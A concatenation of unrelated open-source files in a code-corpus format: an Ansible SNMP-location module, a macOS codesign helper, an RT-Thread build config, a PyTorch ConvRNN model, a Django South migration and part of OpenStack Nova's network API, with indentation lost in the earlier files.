state: present
location: nanjing China
provider: "{{ cli }}"
- name: "Remove SNMP location"
ce_snmp_location:
state: absent
location: nanjing China
provider: "{{ cli }}"
'''
RETURN = '''
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"location": "nanjing China",
"state": "present"}
existing:
description: k/v pairs of existing aaa server
returned: always
type: dict
sample: {}
end_state:
description: k/v pairs of aaa params after module execution
returned: always
type: dict
sample: {"location": "nanjing China"}
updates:
description: command sent to the device
returned: always
type: list
sample: ["snmp-agent sys-info location nanjing China"]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ce import get_config, load_config, ce_argument_spec
class SnmpLocation(object):
""" Manages SNMP location configuration """
def __init__(self, **kwargs):
""" Class init """
# module
argument_spec = kwargs["argument_spec"]
self.spec = argument_spec
self.module = AnsibleModule(argument_spec=self.spec, supports_check_mode=True)
# config
self.cur_cfg = dict()
# module args
self.state = self.module.params['state']
self.location = self.module.params['location']
# state
self.changed = False
self.updates_cmd = list()
self.results = dict()
self.proposed = dict()
self.existing = dict()
self.end_state = dict()
def check_args(self):
""" Check invalid args """
if self.location:
if len(self.location) > 255 or len(self.location) < 1:
self.module.fail_json(
                    msg='Error: The length of location %s is out of range [1 - 255].' % self.location)
else:
self.module.fail_json(
                msg='Error: The length of location is 0.')
def get_proposed(self):
""" Get proposed state """
self.proposed["state"] = self.state
if self.location:
self.proposed["location"] = self.location
def get_existing(self):
""" Get existing state """
tmp_cfg = self.cli_get_config()
if tmp_cfg:
temp_data = tmp_cfg.split(r"location ")
self.cur_cfg["location"] = temp_data[1]
self.existing["location"] = temp_data[1]
def get_end_state(self):
""" Get end state """
tmp_cfg = self.cli_get_config()
if tmp_cfg:
temp_data = tmp_cfg.split(r"location ")
self.end_state["location"] = temp_data[1]
def cli_load_config(self, commands):
""" Load config by cli """
if not self.module.check_mode:
load_config(self.module, commands)
def cli_get_config(self):
""" Get config by cli """
regular = "| include snmp | include location"
flags = list()
flags.append(regular)
tmp_cfg = get_config(self.module, flags)
return tmp_cfg
def set_config(self):
""" Set configure by cli """
cmd = "snmp-agent sys-info location %s" % self.location
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def undo_config(self):
""" Undo configure by cli """
cmd = "undo snmp-agent sys-info location"
self.updates_cmd.append(cmd)
cmds = list()
cmds.append(cmd)
self.cli_load_config(cmds)
self.changed = True
def work(self):
""" Main work function """
self.check_args()
self.get_proposed()
self.get_existing()
if self.state == "present":
if "location" in self.cur_cfg.keys() and self.location == self.cur_cfg["location"]:
pass
else:
self.set_config()
else:
if "location" in self.cur_cfg.keys() and self.location == self.cur_cfg["location"]:
self.undo_config()
self.get_end_state()
self.results['changed'] = self.changed
self.results['proposed'] = self.proposed
self.results['existing'] = self.existing
self.results['end_state'] = self.end_state
self.results['updates'] = self.updates_cmd
self.module.exit_json(**self.results)
def main():
""" Module main """
argument_spec = dict(
state=dict(choices=['present', 'absent'], default='present'),
location=dict(type='str', required=True)
)
argument_spec.update(ce_argument_spec)
module = SnmpLocation(argument_spec=argument_spec)
module.work()
if __name__ == '__main__':
main()
|
gpl-3.0
|
Tatsh/Clementine
|
dist/codesign.py
|
10
|
1320
|
#!/usr/bin/python2
# Emulates the behaviour of codesign --deep which is missing on OS X < 10.9
import os
import re
import subprocess
import sys
def SignPath(path, developer_id, deep=True):
args = [
'codesign',
'--preserve-metadata=identifier,entitlements,resource-rules,requirements',
'-s', developer_id,
'-fv', path
]
if deep:
args.append('--deep')
subprocess.check_call(args)
def main():
if len(sys.argv) != 3:
print 'Usage: %s <developer id> <app bundle>' % sys.argv[0]
sys.exit(1)
developer_id = sys.argv[1]
app_bundle = sys.argv[2]
for root, dirs, files in os.walk(app_bundle):
for dir in dirs:
if re.search(r'\.framework$', dir):
SignPath(os.path.join(root, dir), developer_id)
for file in files:
if re.search(r'\.(dylib|so)$', file):
SignPath(os.path.join(root, file), developer_id)
elif re.match(r'(clementine-spotifyblob|clementine-tagreader|gst-plugin-scanner)', file):
SignPath(os.path.join(root, file), developer_id)
SignPath(app_bundle, developer_id, deep=False)
# Verify the signatures are valid.
subprocess.check_call([
'codesign', '--verify', '--verbose=4', app_bundle])
subprocess.check_call([
'spctl', '--assess', '--verbose=4', app_bundle])
if __name__ == '__main__':
main()
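# A minimal invocation sketch; the signing identity and bundle path are
# hypothetical examples:
#
#   python2 codesign.py "Developer ID Application: Example Corp" Clementine.app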
|
gpl-3.0
|
aozima/rt-thread
|
bsp/taihu/rtconfig.py
|
52
|
1285
|
import os
# toolchains options
ARCH='ppc'
CPU='ppc405'
CROSS_TOOL='gcc'
TextBase = '0x00000000'
PLATFORM = 'gcc'
EXEC_PATH = 'C:/Program Files/CodeSourcery/Sourcery G++ Lite/bin'
BUILD = 'debug'
if os.getenv('RTT_EXEC_PATH'):
EXEC_PATH = os.getenv('RTT_EXEC_PATH')
if PLATFORM == 'gcc':
# toolchains
PREFIX = 'powerpc-eabi-'
CC = PREFIX + 'gcc'
CXX = PREFIX + 'g++'
AS = PREFIX + 'gcc'
AR = PREFIX + 'ar'
LINK = PREFIX + 'gcc'
TARGET_EXT = 'elf'
SIZE = PREFIX + 'size'
OBJDUMP = PREFIX + 'objdump'
OBJCPY = PREFIX + 'objcopy'
DEVICE = ' -mcpu=405 -mno-multiple -mno-string -mno-update -fno-exceptions -fno-builtin -msoft-float'
CFLAGS = DEVICE + ' -D__KERNEL__'
AFLAGS = '-D__ASSEMBLY__ -fno-exceptions -fno-builtin -mregnames -c -Wall -Xassembler -m405 -msoft-float -ffunction-sections'
LFLAGS = DEVICE + ' -Wl,--gc-sections,--cref,-Map=rtthread.map -T taihu.lds' + ' -Ttext=' + TextBase
CPATH = ''
LPATH = ''
if BUILD == 'debug':
CFLAGS += ' -O0 -gdwarf-2'
AFLAGS += ' -gdwarf-2'
else:
CFLAGS += ' -O2'
DASM_ACTION = OBJDUMP + ' -d rtthread-taihu.elf > rtt.asm\n'
POST_ACTION = OBJCPY + ' -O binary $TARGET rtthread.bin\n' + SIZE + ' $TARGET \n' # + DASM_ACTION
|
gpl-2.0
|
blefaudeux/Pinta
|
pinta/model/model_rnn.py
|
1
|
2323
|
import logging
from typing import List
import numpy as np
import torch
import torch.nn as nn
from pinta.model.model_base import NN
LOG = logging.getLogger("ConvRNN")
class ConvRNN(NN):
"""
Combination of a convolutional front end and an RNN (GRU) layer below
>> see https://gist.github.com/spro/c87cc706625b8a54e604fb1024106556
"""
def __init__(
self,
logdir: str,
input_size: int,
hidden_size: int,
kernel_sizes: List[int],
n_gru_layers: int,
output_size: int,
filename=None,
tuning_input_size: int = -1,
):
super().__init__(logdir)
# ----
# Define the model
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.gru_layers = n_gru_layers
# Conv front end
self.conv1 = nn.Conv1d(input_size, hidden_size, kernel_size=kernel_sizes[0])
self.conv2 = nn.Conv1d(hidden_size, hidden_size, kernel_size=kernel_sizes[1])
self.relu = nn.ReLU()
# GRU / LSTM layers
# Requires [batch, seq, inputs]
self.gru = nn.GRU(
hidden_size, hidden_size, n_gru_layers, dropout=0.01, batch_first=True
)
# Ends with a fully connected layer
self.out = nn.Linear(hidden_size, self.output_size)
# Load from trained NN if required
if filename is not None:
self._valid = self.load(filename)
if self._valid:
return
LOG.warning("Could not load the specified net, computing it from scratch")
def forward(self, inputs, hidden=None):
        # Run through the Conv1d layers with ReLU activations
r1 = self.relu(self.conv1(inputs))
r2 = self.relu(self.conv2(r1))
# GRU/LSTM layer expects [batch, seq, inputs]
r2 = r2.transpose(1, 2)
output_rnn, hidden_out = self.gru(r2, hidden)
output = self.out(output_rnn[:, -1, :].squeeze())
return output, hidden_out
def get_layer_weights(self):
return self.conv1.weight
    def _get_conv_out(self, shape):
        # Useful to compute the flattened output size of the conv blocks
        # (including any padding)
        o = self.conv2(self.conv1(torch.zeros(1, *shape)))
        return int(np.prod(o.size()))
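# A minimal shape-check sketch, assuming the NN base class wraps torch.nn.Module
# and only needs a writable log directory; all sizes are illustrative:
#
#   model = ConvRNN(logdir="/tmp/convrnn", input_size=4, hidden_size=8,
#                   kernel_sizes=[3, 3], n_gru_layers=1, output_size=2)
#   x = torch.randn(2, 4, 16)   # [batch, channels, sequence]
#   y, hidden = model(x)        # y has shape [2, 2]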
|
gpl-3.0
|
mmalyska/eve-wspace
|
evewspace/SiteTracker/migrations/0003_auto__add_systemweight.py
|
17
|
15303
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'SystemWeight'
db.create_table('SiteTracker_systemweight', (
('system', self.gf('django.db.models.fields.related.OneToOneField')(related_name='st_weight', unique=True, primary_key=True, to=orm['Map.System'])),
('weight', self.gf('django.db.models.fields.FloatField')()),
))
db.send_create_signal('SiteTracker', ['SystemWeight'])
def backwards(self, orm):
# Deleting model 'SystemWeight'
db.delete_table('SiteTracker_systemweight')
models = {
'Map.system': {
'Meta': {'object_name': 'System', '_ormbases': ['core.SystemData']},
'first_visited': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'info': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'last_visited': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'lastscanned': ('django.db.models.fields.DateTimeField', [], {}),
'npckills': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'occupied': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'podkills': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'shipkills': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'sysclass': ('django.db.models.fields.IntegerField', [], {}),
'systemdata_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.SystemData']", 'unique': 'True', 'primary_key': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
'SiteTracker.claim': {
'Meta': {'object_name': 'Claim'},
'bonus': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'period': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'claims'", 'to': "orm['SiteTracker.ClaimPeriod']"}),
'shareclaimed': ('django.db.models.fields.FloatField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'claims'", 'to': "orm['auth.User']"})
},
'SiteTracker.claimperiod': {
'Meta': {'object_name': 'ClaimPeriod'},
'closetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'endtime': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'loothauledby': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'loothauled'", 'null': 'True', 'to': "orm['auth.User']"}),
'lootsoldby': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'lootsold'", 'null': 'True', 'to': "orm['auth.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'starttime': ('django.db.models.fields.DateTimeField', [], {})
},
'SiteTracker.fleet': {
'Meta': {'object_name': 'Fleet'},
'current_boss': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'currently_bossing'", 'to': "orm['auth.User']"}),
'ended': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'initial_boss': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'bossfleets'", 'to': "orm['auth.User']"}),
'roles_needed': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'fleets_need'", 'symmetrical': 'False', 'to': "orm['SiteTracker.SiteRole']"}),
'started': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'system': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stfleets'", 'to': "orm['Map.System']"})
},
'SiteTracker.payoutentry': {
'Meta': {'object_name': 'PayoutEntry'},
'claim': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'payout'", 'to': "orm['SiteTracker.Claim']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'iskshare': ('django.db.models.fields.BigIntegerField', [], {}),
'report': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'entries'", 'to': "orm['SiteTracker.PayoutReport']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'payouts'", 'to': "orm['auth.User']"})
},
'SiteTracker.payoutreport': {
'Meta': {'object_name': 'PayoutReport'},
'createdby': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'payoutreports'", 'to': "orm['auth.User']"}),
'datepaid': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'grossprofit': ('django.db.models.fields.BigIntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'period': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'reports'", 'to': "orm['SiteTracker.ClaimPeriod']"})
},
'SiteTracker.siterecord': {
'Meta': {'object_name': 'SiteRecord'},
'boss': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sitescredited'", 'to': "orm['auth.User']"}),
'fleet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sites'", 'to': "orm['SiteTracker.Fleet']"}),
'fleetsize': ('django.db.models.fields.IntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'raw_points': ('django.db.models.fields.IntegerField', [], {}),
'site_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sitesrun'", 'to': "orm['SiteTracker.SiteType']"}),
'system': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sitescompleted'", 'to': "orm['Map.System']"}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'weighted_points': ('django.db.models.fields.IntegerField', [], {})
},
'SiteTracker.siterole': {
'Meta': {'object_name': 'SiteRole'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'long_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'short_name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'})
},
'SiteTracker.sitetype': {
'Meta': {'object_name': 'SiteType'},
'defunct': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'longname': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'shortname': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '8'})
},
'SiteTracker.siteweight': {
'Meta': {'object_name': 'SiteWeight'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'raw_points': ('django.db.models.fields.IntegerField', [], {}),
'site_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'weights'", 'to': "orm['SiteTracker.SiteType']"}),
'sysclass': ('django.db.models.fields.IntegerField', [], {})
},
'SiteTracker.systemweight': {
'Meta': {'object_name': 'SystemWeight'},
'system': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'st_weight'", 'unique': 'True', 'primary_key': 'True', 'to': "orm['Map.System']"}),
'weight': ('django.db.models.fields.FloatField', [], {})
},
'SiteTracker.userlog': {
'Meta': {'object_name': 'UserLog'},
'fleet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'members'", 'to': "orm['SiteTracker.Fleet']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'jointime': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'leavetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sitetrackerlogs'", 'to': "orm['auth.User']"})
},
'SiteTracker.usersite': {
'Meta': {'object_name': 'UserSite'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'pending': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'members'", 'to': "orm['SiteTracker.SiteRecord']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sites'", 'to': "orm['auth.User']"})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.constellation': {
'Meta': {'object_name': 'Constellation', 'db_table': "'mapConstellations'", 'managed': 'False'},
'id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True', 'db_column': "'constellationID'"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_column': "'constellationName'"}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'constellations'", 'db_column': "'regionID'", 'to': "orm['core.Region']"}),
'x': ('django.db.models.fields.FloatField', [], {}),
'y': ('django.db.models.fields.FloatField', [], {}),
'z': ('django.db.models.fields.FloatField', [], {})
},
'core.region': {
'Meta': {'object_name': 'Region', 'db_table': "'mapRegions'", 'managed': 'False'},
'id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True', 'db_column': "'regionID'"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_column': "'regionName'"}),
'x': ('django.db.models.fields.FloatField', [], {}),
'y': ('django.db.models.fields.FloatField', [], {}),
'z': ('django.db.models.fields.FloatField', [], {})
},
'core.systemdata': {
'Meta': {'object_name': 'SystemData', 'db_table': "'mapSolarSystems'", 'managed': 'False'},
'constellation': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'systems'", 'db_column': "'constellationID'", 'to': "orm['core.Constellation']"}),
'id': ('django.db.models.fields.IntegerField', [], {'primary_key': 'True', 'db_column': "'solarSystemID'"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_column': "'solarSystemName'"}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'systems'", 'db_column': "'regionID'", 'to': "orm['core.Region']"}),
'security': ('django.db.models.fields.FloatField', [], {}),
'x': ('django.db.models.fields.FloatField', [], {}),
'y': ('django.db.models.fields.FloatField', [], {}),
'z': ('django.db.models.fields.FloatField', [], {})
}
}
complete_apps = ['SiteTracker']
|
gpl-3.0
|
tealover/nova
|
nova/network/api.py
|
17
|
23539
|
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import strutils
from nova import exception
from nova.i18n import _LI
from nova.network import base_api
from nova.network import floating_ips
from nova.network import model as network_model
from nova.network import rpcapi as network_rpcapi
from nova import objects
from nova.objects import base as obj_base
from nova import policy
from nova import utils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
def wrap_check_policy(func):
"""Check policy corresponding to the wrapped methods prior to execution."""
@functools.wraps(func)
def wrapped(self, context, *args, **kwargs):
action = func.__name__
if not self.skip_policy_check:
check_policy(context, action)
return func(self, context, *args, **kwargs)
return wrapped
def check_policy(context, action):
target = {
'project_id': context.project_id,
'user_id': context.user_id,
}
_action = 'network:%s' % action
policy.enforce(context, _action, target)
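# --- Illustrative note (not in the original source): wrap_check_policy only
# enforces a "network:<method name>" policy rule before delegating to the
# wrapped method.  Roughly,
#
#     @wrap_check_policy
#     def get(self, context, network_uuid): ...
#
# is equivalent to calling check_policy(context, "get") first (unless
# self.skip_policy_check is set on the API object) and then the original body.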
class API(base_api.NetworkAPI):
"""API for doing networking via the nova-network network manager.
This is a pluggable module - other implementations do networking via
other services (such as Neutron).
"""
def __init__(self, **kwargs):
self.network_rpcapi = network_rpcapi.NetworkAPI()
helper = utils.ExceptionHelper
# NOTE(vish): this local version of floating_manager has to convert
# ClientExceptions back since they aren't going over rpc.
self.floating_manager = helper(floating_ips.LocalManager())
super(API, self).__init__(**kwargs)
@wrap_check_policy
def get_all(self, context):
"""Get all the networks.
        If it is an admin user then the API will return all the
        networks. If it is a normal user and nova Flat or FlatDHCP
        networking is being used then the API will return all
        networks. Otherwise the API will only return the networks
        which belong to the user's project.
"""
if "nova.network.manager.Flat" in CONF.network_manager:
project_only = "allow_none"
else:
project_only = True
try:
return objects.NetworkList.get_all(context,
project_only=project_only)
except exception.NoNetworksFound:
return []
@wrap_check_policy
def get(self, context, network_uuid):
return objects.Network.get_by_uuid(context, network_uuid)
@wrap_check_policy
def create(self, context, **kwargs):
return self.network_rpcapi.create_networks(context, **kwargs)
@wrap_check_policy
def delete(self, context, network_uuid):
network = self.get(context, network_uuid)
if network.project_id is not None:
raise exception.NetworkInUse(network_id=network_uuid)
return self.network_rpcapi.delete_network(context, network_uuid, None)
@wrap_check_policy
def disassociate(self, context, network_uuid):
network = self.get(context, network_uuid)
objects.Network.disassociate(context, network.id,
host=True, project=True)
@wrap_check_policy
def get_fixed_ip(self, context, id):
return objects.FixedIP.get_by_id(context, id)
@wrap_check_policy
def get_fixed_ip_by_address(self, context, address):
return objects.FixedIP.get_by_address(context, address)
@wrap_check_policy
def get_floating_ip(self, context, id):
if not strutils.is_int_like(id):
raise exception.InvalidID(id=id)
return objects.FloatingIP.get_by_id(context, id)
@wrap_check_policy
def get_floating_ip_pools(self, context):
return objects.FloatingIP.get_pool_names(context)
@wrap_check_policy
def get_floating_ip_by_address(self, context, address):
return objects.FloatingIP.get_by_address(context, address)
@wrap_check_policy
def get_floating_ips_by_project(self, context):
return objects.FloatingIPList.get_by_project(context,
context.project_id)
@wrap_check_policy
def get_instance_id_by_floating_address(self, context, address):
fixed_ip = objects.FixedIP.get_by_floating_address(context, address)
if fixed_ip is None:
return None
else:
return fixed_ip.instance_uuid
@wrap_check_policy
def get_vifs_by_instance(self, context, instance):
vifs = objects.VirtualInterfaceList.get_by_instance_uuid(context,
instance.uuid)
for vif in vifs:
if vif.network_id is not None:
network = objects.Network.get_by_id(context, vif.network_id,
project_only='allow_none')
vif.net_uuid = network.uuid
return vifs
@wrap_check_policy
def get_vif_by_mac_address(self, context, mac_address):
vif = objects.VirtualInterface.get_by_address(context,
mac_address)
if vif.network_id is not None:
network = objects.Network.get_by_id(context, vif.network_id,
project_only='allow_none')
vif.net_uuid = network.uuid
return vif
@wrap_check_policy
def allocate_floating_ip(self, context, pool=None):
"""Adds (allocates) a floating ip to a project from a pool."""
return self.floating_manager.allocate_floating_ip(context,
context.project_id, False, pool)
@wrap_check_policy
def release_floating_ip(self, context, address,
affect_auto_assigned=False):
"""Removes (deallocates) a floating ip with address from a project."""
return self.floating_manager.deallocate_floating_ip(context, address,
affect_auto_assigned)
def disassociate_and_release_floating_ip(self, context, instance,
floating_ip):
"""Removes (deallocates) and deletes the floating ip.
This api call was added to allow this to be done in one operation
if using neutron.
"""
address = floating_ip['address']
if floating_ip.get('fixed_ip_id'):
try:
self.disassociate_floating_ip(context, instance, address)
except exception.FloatingIpNotAssociated:
msg = ("Floating ip %s has already been disassociated, "
"perhaps by another concurrent action.") % address
LOG.debug(msg)
# release ip from project
return self.release_floating_ip(context, address)
@wrap_check_policy
@base_api.refresh_cache
def associate_floating_ip(self, context, instance,
floating_address, fixed_address,
affect_auto_assigned=False):
"""Associates a floating ip with a fixed ip.
Ensures floating ip is allocated to the project in context.
Does not verify ownership of the fixed ip. Caller is assumed to have
checked that the instance is properly owned.
"""
orig_instance_uuid = self.floating_manager.associate_floating_ip(
context, floating_address, fixed_address, affect_auto_assigned)
if orig_instance_uuid:
msg_dict = dict(address=floating_address,
instance_id=orig_instance_uuid)
LOG.info(_LI('re-assign floating IP %(address)s from '
'instance %(instance_id)s'), msg_dict)
orig_instance = objects.Instance.get_by_uuid(context,
orig_instance_uuid)
# purge cached nw info for the original instance
base_api.update_instance_cache_with_nw_info(self, context,
orig_instance)
@wrap_check_policy
@base_api.refresh_cache
def disassociate_floating_ip(self, context, instance, address,
affect_auto_assigned=False):
"""Disassociates a floating ip from fixed ip it is associated with."""
return self.floating_manager.disassociate_floating_ip(context, address,
affect_auto_assigned)
@wrap_check_policy
@base_api.refresh_cache
def allocate_for_instance(self, context, instance, vpn,
requested_networks, macs=None,
security_groups=None,
dhcp_options=None):
"""Allocates all network structures for an instance.
:param context: The request context.
:param instance: nova.objects.instance.Instance object.
:param vpn: A boolean, if True, indicate a vpn to access the instance.
:param requested_networks: A dictionary of requested_networks,
Optional value containing network_id, fixed_ip, and port_id.
:param macs: None or a set of MAC addresses that the instance
should use. macs is supplied by the hypervisor driver (contrast
with requested_networks which is user supplied).
:param security_groups: None or security groups to allocate for
instance.
:param dhcp_options: None or a set of key/value pairs that should
determine the DHCP BOOTP response, eg. for PXE booting an instance
configured with the baremetal hypervisor. It is expected that these
are already formatted for the neutron v2 api.
See nova/virt/driver.py:dhcp_options_for_instance for an example.
:returns: network info as from get_instance_nw_info() below
"""
# NOTE(vish): We can't do the floating ip allocation here because
# this is called from compute.manager which shouldn't
# have db access so we do it on the other side of the
# rpc.
flavor = instance.get_flavor()
args = {}
args['vpn'] = vpn
args['requested_networks'] = requested_networks
args['instance_id'] = instance.uuid
args['project_id'] = instance.project_id
args['host'] = instance.host
args['rxtx_factor'] = flavor['rxtx_factor']
args['macs'] = macs
args['dhcp_options'] = dhcp_options
nw_info = self.network_rpcapi.allocate_for_instance(context, **args)
return network_model.NetworkInfo.hydrate(nw_info)
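    # --- Illustrative sketch (not in the original source): a hedged example of
    # how a compute-side caller might invoke allocate_for_instance.  The
    # network_api, context and instance objects are assumptions; only the
    # keyword names are taken from the signature above.
    #
    #     nw_info = network_api.allocate_for_instance(
    #         context, instance, vpn=False, requested_networks=None,
    #         macs=None, security_groups=None, dhcp_options=None)
    #     print(nw_info.fixed_ips())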
@wrap_check_policy
def deallocate_for_instance(self, context, instance,
requested_networks=None):
"""Deallocates all network structures related to instance."""
# NOTE(vish): We can't do the floating ip deallocation here because
# this is called from compute.manager which shouldn't
# have db access so we do it on the other side of the
# rpc.
if not isinstance(instance, obj_base.NovaObject):
instance = objects.Instance._from_db_object(context,
objects.Instance(), instance)
self.network_rpcapi.deallocate_for_instance(context, instance=instance,
requested_networks=requested_networks)
# NOTE(danms): Here for neutron compatibility
def allocate_port_for_instance(self, context, instance, port_id,
network_id=None, requested_ip=None):
raise NotImplementedError()
# NOTE(danms): Here for neutron compatibility
def deallocate_port_for_instance(self, context, instance, port_id):
raise NotImplementedError()
# NOTE(danms): Here for neutron compatibility
def list_ports(self, *args, **kwargs):
raise NotImplementedError()
# NOTE(danms): Here for neutron compatibility
def show_port(self, *args, **kwargs):
raise NotImplementedError()
@wrap_check_policy
@base_api.refresh_cache
def add_fixed_ip_to_instance(self, context, instance, network_id):
